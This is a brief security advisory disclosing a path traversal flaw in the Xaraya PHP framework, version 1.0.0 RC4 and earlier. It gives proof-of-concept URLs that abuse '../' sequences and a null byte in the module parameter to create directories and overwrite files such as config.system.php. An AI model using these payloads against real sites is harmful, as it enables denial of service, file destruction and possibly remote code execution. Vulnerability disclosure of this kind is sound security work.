Xaraya <= 1.0.0 RC4 D.O.S / file corruption software: site: http://www.xaraya.com description: "Xaraya 1.0 Core is an Open Source web application framework written in PHP" vulnerable code in create() function in xarMLSXML2PHPBackend.php: i) you can create an empty dir, in some cases this leads to D.O.S. condition,poc: http://[target]/[path_to_xaraya]/index.php?module=../../../../.key.php http://[target]/[path_to_xaraya]/index.php?module=../../../../../.htaccess ii) you can overwite any file on target system, using null char example, D.O.S, overwriting a system file: http://[target]/[path_to_xaraya]/index.php?module=../../../../config.system.php%00 this could lead to remode code execution condition even, if a user overwrite some file where an inclusion path is defined rgod site: http://rgod.altervista.org mail: retrogod at aliceposta it original advisory: http://rgod.altervista.org/xaraya1DOS.hmtl
